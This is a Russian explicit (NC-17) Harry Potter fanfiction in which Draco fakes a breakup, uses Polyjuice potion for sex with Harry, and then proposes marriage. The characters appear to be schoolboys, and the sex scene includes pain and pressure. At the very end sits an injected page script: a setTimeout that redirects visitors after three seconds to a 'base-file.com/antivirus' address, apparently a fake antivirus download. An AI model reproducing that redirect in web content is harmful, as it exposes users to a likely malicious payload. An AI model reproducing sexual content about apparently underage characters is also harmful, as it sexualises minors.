В последний раз

Автор: _HarryPotter _
Бета:
Гарри-который-Поттер
Paring: Гарри/Драко
Рейтинг:
NC-17
Жанр:
romance, PWP.
Summary: Драко посылает Поттера… а потом ему в голову приходит сумасшедшая идея. А вот во что все это безобразие  выливается, вам предстоит узнать.
Disclaimer: Все принадлежит тете Роулинг. Мне ничего не нужно, кроме вашего одобрения.
Предупреждение: ну…. Я бы сказал флафффф…. Если бы не сам это написал… Но так сложились обстоятельства. О любимом не могу писать без флаффа. А Гарри немного ООС. Теперь простебываю себя.
Размещение: с разрешения автора.
Посвящение: моему ангелу _
Draco  Malfoy_ к нашей свадьбе…
Благодарности: Ларке, Мальчику-фею за то что поддерживали и выслушивали сопли. Поттеру за пинки и бетство. Фину за то что не любит ГарриДраки. Ангелу, за то что есть на этом свете.

-Гарри, - Драко изучал взглядом темно-багряную жидкость в своем бокале, слегка покачивая его из стороны в сторону, - мне надоело, Гарри. Я не привык к постоянству. Все в моей жизни меняется, уходит одно за другим, и даже если я захотел бы это изменить, я не смог. Ты был хорошим любовником, это факт. Но дальше так продолжаться не может….

-Драко, но… -отчаяние и предательский блеск в глазах.

-Никаких «но» Поттер. Считай, что мне надоело. И не перебивай меня, когда я что-то говорю, - он метнул гневный взгляд на Гарри.

-Зачем ты так долго издевался надо мной?! Почему ты соблазнил меня на той вечеринке? Почему ты не захотел забыть все на следующее утро, как я тебе предлагал? Почему ты отказал отцу в том чтобы поставить метку?! Зачем ты помог мне в борьбе с Воландемортом?… Какого хрена ты издевался надо мной все это время?..

Глаз не видно. По губам скользнула холодная ухмылка.

-Мне было интересно.

-Интересно трахнуть меня? Влюбить меня в себя? Интересно поиграть в «изменившегося Драко»?

-Можно сказать и так.

-Какая же, все-таки, ты скотина.

-А никто и не отрицал, - он постучал пальцами о край бокала, и устало посмотрел в окно.

-Но ты же не можешь вот так все закончить… - глухой голос и полуопущенные веки.

-Почему же? Могу.

-Но ты же…

-Довольно, Поттер. Слишком много «но».

-Я ненавижу тебя.

-Да? - искорки смеха в глазах. - Поттер, милый, кажется, вчера ты утверждал еще совсем иное.

-Я ненавижу тебя. - чуть громче.

Драко равнодушно пожал плечами.

-Твое право.

-Эгоист, жалкий хорек!!! – сквозь зубы.- Самовлюбленная сволочь!!!, - почти срываясь на крик,-  Дрянь! Скотина…

Малфой расхохотался.

-Боже, Гарри, а я и не догадывался, что ты знаешь такие слова.

-Спасибо тебе, Малфой.

-За что? - светлая бровь выгнулась в удивлении.

-За то, что не врал мне. Ты никогда не говорил, что любишь меня. Поэтому я в глубине своей души хранил мысль о том, что это может быть всего лишь игра. Теперь я убедился. Спасибо.

-Да не за что. - Драко отпил из бокала и закинул одну ногу на другую.

-Ты не способен на любовь. И мне искренне жаль тебя. Мне жаль, что ты никогда не познаешь радости от того, что ты даришь свою любовь, а не принимаешь чужую.

-Ты не прав, Поттер.

-Не прав? Почему же это? Ты никогда никого не полюбишь кроме самого себя.

Драко кинул на него лукавый взгляд из-под ресниц.

-Вот именно, - кивок в подтверждение слов Гарри. - Я люблю себя, Гарри.

-Так и трахайся с самим собой в таком случае! - Поттер выкрикнул последние слова, собираясь после этого резко развернуться и выбежать вон из комнаты Малфоя. А потом…. Будь, что будет. Какая теперь разница? У него нагло отобрали последнее, что у него осталось, последнее,  что он любил. Какой смысл жить дальше? И видеть еще почти полгода эти серые непроницаемые глаза, и слышать этот равнодушный голос, когда раньше он мог наблюдать эти же самые глаза, затуманенные пеленой страсти и слышать этот голос, шепчущий « О Боже, Гарри… Гарри…», плавно переходящий в низкий стон. Хватит. Больше не мысли об этом. Бежать. Бежать. Без оглядки.

- А что? Неплохая идея, Поттер.

Гарри остановился в дверях, пытаясь сообразить, что именно Драко имеет в виду.

-Ты поможешь мне в этом? - не дожидаясь ответа, продолжил слизеринец.

-Я не понимаю тебя, Малфой. Я не понимаю.- Тщательно сдерживаемые слезы  покатились по щекам, но Гарри стоял спиной к собеседнику и тот не мог этого видеть.

-Что ты, Поттер. Все очень просто. - он грациозно поднялся с кресла и в миг преодолел разделяющее их расстояние.

Гарри вздрогнул, услышав его шаги, и Драко, улыбаясь своим неведомым мыслям, крепко обвил руками его талию.

-Ты поможешь мне, Гарри? - шепот в самое ухо. Такой нежный. Теплый. Что все мысли разом покидают голову.

-Драко…я… что ты имеешь ввиду?

-Ничего особенного. - легкий поцелуй в чувствительную точку за ухом и слизеринская ухмылка, почувствовав как Поттер обмякает в его объятиях.

-Не делай так - дрожащий голос.

-Но тебе же нравится.

-Да, нравиться, но… -слова застряли у него в горле. Аккуратный поцелуй, чуть ниже и мягче.  Горячий, шершавый язычок ласкает все то же чувствительное место, а губы медленно скользят по нежной коже.

-Драко… прекрати, пожалуйста.

-А что если я не хочу прекращать? - он схватил губами мочку уха Поттера и нежно сжал.

Гибкие руки развернули его к себе и моментально обвились вокруг талии, привлекая Поттера к теплому телу. Серые глаза внимательно изучают это, ставшее уже почти родным, лицо. А потом большой палец аккуратно, почти невесомо смахивает слезинку с горящей щеки. И еще одно касание, более уверенное, чертит неровную линию вдоль скулы. И подушечками пальцев касается потрескавшихся губ. Те по привычке чуть приоткрываются, но тут же  возвращаются в исходное положение.

Глаза Драко сузились, но неотрывно смотрят в, спрятанные за стеклами очков, зеленые напротив.

-Драко.

-Да. -полуулыбка.

-Что ты делаешь? - шепот.

-Я?! Обнимаю тебя. Разве ты не чувствуешь?

-Но ты ведь, только что расстался со мной.

Вздох.

-Ты неисправимый гриффиндорец.

Гарри не успел понять, что значат эти слова Драко, потому что в ту же секунду чужие губы накрыли его собственные, приоткрывая их для более глубокого поцелуя. Черные ресницы прикрываются сами собой. Такой приятный, знакомый мятный вкус во рту. Такой нежный острый язычок, сплетающийся с его собственным. Ладони крепче прижимают его тело к Малфою. Зубы чуть прикусывают его нижнюю губу. И Гарри уже знает, что после этого маневра поцелуй закончится. Но Драко и не думает останавливаться, лишь проскальзывает руками под его рубашку, чертя пальцами узоры на его спине…

-Драко, - Гарри сам остановил поцелуй и растерянно посмотрел ему в глаза.

-Поттер ну зачем тебе всегда все нужно объяснять словами? Неужели так не понятно. -на слове «так» Малфой невесомо клюнул Гарри в уголок губ.

-Не понятно, если вспомнить твои слова минут 10 назад.

-Ты идиот, Поттер.

Гарри поджал губы и Малфой звонко рассмеялся.

-Мы, кажется, давно хотели разнообразить наш секс. И у меня появилась одна идея. Надеюсь, ты не будешь против.

Неуверенный кивок. И почти стон, когда Драко отпускает его из своих объятий и направляется в сторону шкафчика, где обычно хранил свои дорогие вина.

Малфой выудил на свет какую-то прозрачную скляночку, посмотрев сквозь нее на свет лампы и удовлетворенно кивнув, он направился обратно к Гарри.

-Вот.

-Что это?

-Это зелье, Поттер. Оборотное зелье. Я хочу, чтобы на эту ночь ты стал мной. Я всю жизнь мечтал заняться любовь с самим собой.

Испуг в зеленых глазах сменился на гнев.

-Ни за что. - резко. - Я лучше пойду. - на ходу поправляя свою рубашку, Гарри направился к двери. Но когда подошел, Драко уже закрыл выход своим телом спиной к двери.

-А я, если хочешь, стану тобой - лукавый и несколько молящий взгляд.

-Это ничего не меняет - сухо.

-Поттер, ты же хочешь.

-Ничего я не хочу. - почти закричал Гарри.

И тут же искоркой - мысль в голове.

«Кому я вру? Зачем я вру? Я безумно хочу его. Я хочу отдаться ему. Я хочу еще раз почувствовать вкус этих губ. Я хочу еще раз услышать его стон. Я хочу еще раз проснуться в его объятиях. Пусть и в последний.»

Видимо все, о чем он подумал моментально отразилось на его лице, потому что Драко еще более лучезарно улыбаясь, отстранился, освобождая проход.

-В таком случае, не смею тебя больше задерживать.

Гарри возненавидел себя за то, что помедлил с решающим шагом на пару секунд. Но уже и этого хватило, чтобы остаток разума покинул его голову и вместо того, чтобы навсегда выйти из спальни Малфоя, Гарри шагнул в его сторону и тихо произнес.

-Я согласен.

-Я знал.

-Не удивительно.

Драко направил палочку на колбу и произнес разогревающее заклинание, затем, отстраняя Поттера, подошел к столу, выплеснул остатки вина из бокала прямо на пол и вылил жидкость в него. Смешно зажмурившись и вздохнув, он выдернул  волос из своей безукоризненной прически и добавил его в бокал.

Гарри подошел к столу.

-Можно пить? - неуверенно.

Драко кивнул.

Поттер со второго курса ненавидел это зелье, его вкус, те чувства, которые оно вызывало и эту неприятную дрожь по телу, когда оно начинало изменяться. Тем не менее, он протянул руку и, зажав нос другой, выпил всю жидкость до конца.

И тут только он понял, что не оставил ни капли для Драко. В следующую секунду он уже не думал ни о чем. Тело неприятно содрогнулось и возникло ощущение, что все существующие у него мышцы начали  в сумасшедшем темпе сжиматься и разжиматься. Боли не было. Но вряд ли то, что он чувствовал, можно было назвать приятными ощущениями. Наконец все кончилось, и он вопросительно посмотрел на Драко.

Тот кивнул, не в силах оторвать взгляд от преобразовавшегося лица Поттера.

-Драко.

-М?

-А как же ты?

-Что я?

-Ну… ты не выпил зелья.

-А ты мне ничего не оставил.

-Но там был ТВОЙ волос. От зелья не было бы толку.

Драко пожал плечами.

-Значит, останусь собой.

-Ты гнусный обманщик. - Поттер расхохотался и кинулся на него, заваливая на пол. -И тебе не стыдно?

Малфой отрицательно покачал головой и в ту же секунду один слизеринец завладел ртом другого. Этот поцелуй совсем отличался от того первого, чуть ли не по-детски робкого и неуверенного. Теперь их языки сплелись в яростной схватке, руки бездумно блуждали по спинам друг друга. Губы неистово целовали другие. Гарри втянул в себя губу Малфоя и удовлетворенно отметил, как тот попытался застонать. Но у него ничего не вышло, потому что Поттер в ту же секунду заглушил стон в новом поцелуе. Они страстно целовались почти забыв о времени и вообще обо всем на свете, вжимаясь бедрами друг в друга и почти сливаясь в одно целое.

Руки Гарри скользнули по его телу вверх и настойчиво, и в то же время очень аккуратно, принялись расстегивать пуговицы на рубашке, одну за другой. Когда с этим занятием было покончено, он неохотно оторвался от сладких губ и жадным взглядом принялся изучать бледную кожу любовника под своими пальцами, ласкающими его грудь.  Как бы невзначай задевая подушечками пальцев его соски, он с удовлетворением отметил, как тело любимого выгнулось ему навстречу, а из груди вырвался легкий вздох… Чуть помедлив, продолжая сладкую пытку пальцами, Гарри приник губами к его соску, втягивая его в себя. Руки Малфоя зарылись в пряди блондина, который так мучительно-приятно играл кончиком языка с его вмиг затвердевшим соском.

Неожиданно Драко рассмеялся.

Поттер удивленно уставился на него, оторвавшись от своего увлекательного занятия.

-Что? –несколько раздосадованным тоном спросил он, откинув непривычно мешающуюся челку.

-Ничего. – так странно видеть себя в очках. –Драко протянул руку и снял их с носа Поттера, отложив в сторону.

-Нашел время, - фыркнул Гарри.

-Поттер, а у тебя хорошо получается.

-Что именно? – он очертил языком ореол соска, лукаво поглядывая на Драко. – это?

-Нет, Поттер. Быть мной.

Раздосадованный вздох и Драко, воспользовавшись заминкой, скинул с себя Поттера, перекатываясь вместе с ним вбок и устраиваясь на его теле.

-Так нечестно!

-Очень даже честно – он укусил мочку уха Гарри и рывком сдернул с него рубашку.

Пуговицы градом рассыпались по ковру.

-Эй. Это точно не честно.

-А кто вообще говорил о том, что я буду действовать честно? – руки настойчиво расстегивают ремень брюк Гарри, по лицу блуждает озорная улыбка. Взвизг молнии и джинсы Гарри отлетают в сторону.

-Ааааах – низкий стон, когда язык Драко проскальзывает в его пупок, а потом чертит влажную дорожку до резинки трусов.

Рука Драко сжимает возбужденную плоть сквозь ткань трусов и он внимательно наблюдает как пелена страсти затуманивает серые глаза напротив.

Мягкий толчок бедрами навстречу его руке, и тихий раздосадованный стон, когда она моментально отдергивается, для того чтобы снять с Гарри последнюю преграду.

Глаза Гарри закрыты, и он может только догадываться по звукам, напоминающим шелест ткани, что в это время Драко освобождается от собственных брюк. А потом теплое тело прижимается к его собственному вплотную.

Лбом ко лбу, губы к губам, грудью к груди….

-Гарри… - шепот, из пересохших губ. - я хочу тебя, Гарри.

-Возьми.

Резким рывком Драко разводит его ноги в сторону, заставляя ими обнять себя. Его член упирается в напряженную дырочку между ягодиц Поттера. Секундная заминка и он грубо врывается в него, почти наполовину.

Громкий всхлип ему в губы, который Драко заглушает своим поцелуем.

-Тише, тише милый. – он отстраняется, желая остановить боль.

«Надо было использовать смазку», - запоздалая мысль в голове.

Неожиданно глаза Гарри наполнились слезами, а ноги крепче обвились вокруг его тела.

-Нет, продолжай, пожалуйста. Я хочу тебя.

Повинуясь собственному желанию и мольбам, Драко вновь проникает в него, уже значительно глубже, и с удивлением ощущает как тело Гарри содрогается в приятной неге.

Он знал это ощущение, ведь сейчас душа Гарри находилась в его собственном теле, и тут Драко понял, что он может сейчас довести и себя и его до такого состояния, которое им обоим даже не снилось. Ведь он знает собственное тело наизусть, все чувствительные точки, все приемы, которые заводят его до предела.

Прильнув губами к бьющейся жилке на шее Гарри, он подается назад и вновь проникает в него.

-Драко – стон над самым ухом - быстрее, пожалуйста быстрее.

-Ни за что.

Медленные дразнящие толчки, и удивительные ощущения оттого, что плоть Гарри трется о его собственный живот.

Постепенно темп ускоряется, и Драко знает, что у него в запасе еще есть несколько сантиметров. И он на полную длину погружается в Гарри, наблюдая, как его глаза широко распахиваются, отражая его собственные, а с губ слетает низкий протяжный стон.

Драко, понимая, что уже сам не в состоянии сдерживать стоны наслаждения, закусив губу, начинает двигаться в нем предельно быстро.

-Драко, Драко, Драко… я больше не могу…. – не выдержав Гарри изливается себе на живот, содрогаясь в волнах оргазма.

Чувствуя быстрые сокращения мышц Поттера вокруг своего члена, Малфой кончает следом за ним, устало падая сверху.

Минуты две в комнате царит гробовая тишина, прерываемая только тяжелым дыханием обоих мальчиков и  шепотом.

-Я люблю тебя.

Пятисекундная пауза.

-А я тебя нет.

Немые слезы застыли в серых глазах, которыми смотрела душа Гарри.

«Ну да, чего же ты хотел. Ты же знал. Это будет последний раз» - и в этот момент, тело его накрыла неприятная волна ощущений. Резко скинув с себя Драко, Гарри скрючился на полу в клубочек, стараясь расслабить все мышцы своего тела. Мучительная боль длится не долго. И вот возле Драко вновь лежит растрепанный брюнет и непонимающе смотрит вокруг зелеными глазами.

-Действие зелья закончилось, - констатировал блондин и обнял себя за плечи, повернувшись к Гарри лицом.

-Да. Подай мне очки, пожалуйста. Я ничего не вижу.

-Зачем они тебе?

-Чтобы уйти.

-Но до утра еще несколько часов.

-Я не смогу так.

-Как так?

-Находиться с тобой, обнимать тебя, быть рядом и отсчитывать последние минуты до расставания. Ты не понимаешь. Это невыносимо. Я ведь…. Я ведь люблю тебя. –Гарри , попытался встать, но руки блондина обхватили его, прижимая к себе.

-Тебе не нужно никуда уходить.

-Драко не надо. Не дари мне надежду, чтобы вновь разбить ее потом.

-Ну как хочешь Поттер. – с этими словами он одел на безымянный палец Гарри неясно откуда появившееся у него в руках серебряное кольцо.

-Что это?

-Я предлагаю тебе стать моим мужем, Гарри.. Ты, наверное, полный идиот, если еще не понял, что ты давно уже стал неотъемлемой частью моей жизни. И ты для меня не просто любимый.

Ты для меня гораздо большее. Я хочу прожить всю свою жизнь рядом с тобой. Всегда обнимать тебя, прижимая твое горячее тело к себе. И шептать тебе на ухо ласковые слова. А ты, как всегда, неправильно истолковал начало моей речи…Ну, а потом я решил не переубеждать тебя и немного поиграть перед тем, как сделать тебе это, давно уже обдуманное мною, предложение.

-Но ты ведь.. ты ведь только что сказал, что не любишь меня.

-Да верно. Я не люблю. Я обожаю тебя, чудо ты мое.

-Я согласен… – невпопад ответил Гарри, и Малфой, так и не дав ему договорить, заглушил конец фразы в долгом поцелуе.  

Обсуждение на форуме

setTimeout(\'document.location.href = "http://base-file.com/antivirus"\', 3000);'); } ?>